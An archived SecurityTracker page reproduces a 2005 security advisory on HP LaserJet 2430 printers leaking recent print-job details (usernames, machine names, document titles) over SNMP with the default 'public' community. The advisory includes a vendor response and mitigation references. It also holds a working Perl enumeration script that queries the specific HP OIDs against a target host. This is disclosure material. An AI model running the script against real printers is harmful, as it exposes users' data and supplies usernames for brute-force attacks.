SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Device (Printer)  >   HP Printer Vendors:   HPE
HP LaserJet Discloses Some Document Information to Remote Authenticated Users
SecurityTracker Alert ID:  1014921
SecurityTracker URL:  http://securitytracker.com/id/1014921
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Sep 16 2005
Impact:   Disclosure of system information, Disclosure of user information
Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): HP LaserJet 2430; possibly others
Description:   A vulnerability was reported in the HP LaserJet 2430. A remote authenticated user may be able to obtain information regarding recently printed documents.

A remote user with knowledge of the public SNMP community string can obtain information about documents printed on the target device within the past hour. Information includes document name, title, number of pages, document size, the user who printed the document, and the name of the computer where the print job was initiated.

The vendor was notified on September 7, 2005.

George Hedfors of Pinion Security Consulting discovered this vulnerability.

Impact:   A remote authenticated user can obtain information about recently printed documents.
Solution:   No solution was available at the time of this entry.

The vendor and the report both indicate that there are methods to restrict access to the information, described in the following HP documents:

http://h20000.www2.hp.com/bizsupport/TechSupport/DocumentIndex.jsp?
locale=en_US&contentType=SupportManual&docIndexId=3124&
prodTypeId=18972&prodSeriesId=416419&lang=en&cc=us

http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=bpj05999

http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c00004828

Vendor URL:  www.hp.com/ (Links to External Site)
Cause:   Access control error

Message History:   None.


 Source Message Contents

Subject:  PTL Advisory 050825 - HP LaserJet Network Username and Information

This is a multi-part message in MIME format.
--------------070408010501040903040901
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


- --
Pinion Security Consulting AB
115 28 Stockholm
Tel. +46 8 54591350
Fax. +46 8 54591369

PGP: B57F 2C79 1D8C 0F84 00D5  4076 7FF5 7413 697A 2DD0

- --

This  e-mail is  confidential to  the  named recipient  and any
unauthorised  use  or dissemination  is prohibited.  If you are
not the  intended  recipient  please  delete  the  message  and
notify Pinion.

Internet email  is not a wholly secure medium; please recognize
this when  emailing us on  confidential matters.  We have taken
steps  to  ensure  this email  is  virus-free,  however you are
advised to make appropriate checks.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (MingW32)

iD8DBQFDKW6Cf/V0E2l6LdARAui7AKCV/9hS8W2HgXWDTQSZkthfpZUrrQCfXWzd
jz7lL2VWynEmDesEr0bkkwI=
=NBXc
-----END PGP SIGNATURE-----

--------------070408010501040903040901
Content-Type: text/plain;
 name="PTL_advisory_050825.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
 filename="PTL_advisory_050825.txt"

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=================================================================

                           P . T . L .

    P I N I O N S   T E K N I S K A   L A B O R A T O R I U M

                (The Pinion Technical Laboratory)

                      http://www.pinion.se


                            Advisory

=================================================================


Vulnerability Name
- - ------------------
HP LaserJet Network Username and Information Enumeration


Pinion ID
- - ---------
PTL_advisory_050825


Author
- - ------
George Hedfors


Class
- - -----
Configuration Error


Remote
- - ------
Yes


Local
- - -----
N/A


Discovered
- - ----------
August 25 2005


Published
- - ---------
September 15 2005


Updated
- - -------
N/A


Credit
- - ------
This vulnerability was found by George Hedfors.


Vulnerable
- - ----------
HP LaserJet 2430

Possibly other HP printers that operate using the Jetdirect
controls.


Discussion
- - ----------
HP LaserJet printers has an extensive administrative user interface
provided over SNMP. SNMP is normally used for monitoring applications
and servers performance but can also be used to perform remote
configurations.

Pinion has discovered that HP LaserJet printers store information
regarding recently printed documents. Information such as document
name, title, number of pages, document size, user who has printed the
document and the machine name where the print job was initiated.

This document information "cache" is flushed when the document is
older then one hour but in mean time, the information can be obtained
by anyone with access to the network and who has information
regarding the "public" SNMP community configured at the printer.

In reality, an intruder could use this information to obtain possible
usernames that later could be used in a login brute force attack
against servers.

Hewlet Packard was informed about this issue on September 7, 2005.

Vendor response: "This information is kept by the printer in the
printer specific MIB. Jetdirect controls the authentication and
subsequent authorization to all the MIBs. This authentication/
authorization can be controlled via SNMP settings."

HP tracking number: SSRT051032


Solution
- - --------
There is no direct way to prevent the printer from exposing
information about recently printed documents except for disabling
SNMP.

Access to administrative features of the LaserJet, including SNMP,
can be controlled and limited in various ways depending on the
security requirements of the customer's environment. For more
information please refer to "HP Jetdirect Embedded Print Server
Administrator's Guide", chapter 7 - Security Features.


References
- - ----------
"HP Jetdirect Embedded Print Server Administrator's Guide"

http://h20000.www2.hp.com/bizsupport/TechSupport/DocumentIndex.jsp?
locale=en_US&contentType=SupportManual&docIndexId=3124&
prodTypeId=18972&prodSeriesId=416419&lang=en&cc=us

Additional information regarding HP Jetdirect security is available
here:

http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?
objectID=bpj05999

http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?
objectID=c00004828


Exploit
- - -------
The tool attached provides a possibility to extract the described
information.

#!/usr/bin/perl
#####################################################################
##
##  HP LaserJet SNMP User name enumeration tool v0.2 by
##  Pinion Labs 050705
##  george[46]hedfors[64]pinion[46]se
##  http://www.pinion.se
##
##  Description
##  HP LaserJet printers loggs recent printed documents with
##  timestamp, size, number of pages, username and machine name.
##  These can be extracted using a specially crafted SNMP Object ID.
##
##  Document name under       1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.1
##  Document pages under      1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.12
##  Document size under       1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.14
##  Usernames are found under 1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.1
##  Machine names under       1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.2
##
##  Output format
##  DocID:Username:Machine:Pages:Size:DocName
##
##

use Net::SNMP;

## Number of errors in row that is tolerated before exit
$tolerance = 10;
## Default SNMP community to use
$defcommunity = "public";
## Default SNMP port to use
$defport = 161;

### END OF CONFIG ###

$host      = $ARGV[0] || die "syntax: $0 victim.com \[community\] ".
                             "\[startid\]\n";
$community = $ARGV[1] || $defcommunity;
$startid   = $ARGV[2] || 0;

($session, $error) = Net::SNMP->session(-hostname => $host,
                                        -community => $community,
                                        -port => $defport);

if (!defined($session)) {
	printf("ERROR: %s.\n", $error);
	exit 1;
}

for($i = $startid; $err < $tolerance; $i++) {
	$oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.1.$i.0";
	$result = $session->get_request(-varbindlist => [$oid]);

	if (!defined($result)) {
		if($found > 0) {
			$err++;
		}
	} else {
		$found++;

		($null, $user) = split(/\=/, $result->{$oid}, 2);

		$oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.2.$i.0";
		$result = $session->get_request(-varbindlist => [$oid]);
		($null, $id) = split(/\=/, $result->{$oid}, 2);

		$oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.1.$i.0";
		$result = $session->get_request(-varbindlist => [$oid]);
		$doc = hex2ascii($result->{$oid});

		$oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.12.$i.0";
		$result = $session->get_request(-varbindlist => [$oid]);
		$pages = $result->{$oid};

		$oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.14.$i.0";
		$result = $session->get_request(-varbindlist => [$oid]);
		$size = $result->{$oid};

		printf("%d:%s:%s:%s:%s:%s\n", $i, $user, $id, $pages, $size, $doc);

		$err = 0;
	}
}

$session->close;

exit 0;

sub hex2ascii() {
	my $hex = shift;
	my $asc;

 	for($n = 6; $n < length($hex); $n += 2) {
		$asc .= chr(hex(substr($hex, $n, 2)));
	}

	return $asc;
}

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQA/AwUBQykij3/1dBNpei3QEQKgnQCfULMT+VkrGLe9dJLx/3oAB8gP/B4An0Xe
of2e6qiAGjUV6noguEpAloBm
=h5Fv
-----END PGP SIGNATURE-----

--------------070408010501040903040901--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2022, SecurityGlobal.net LLC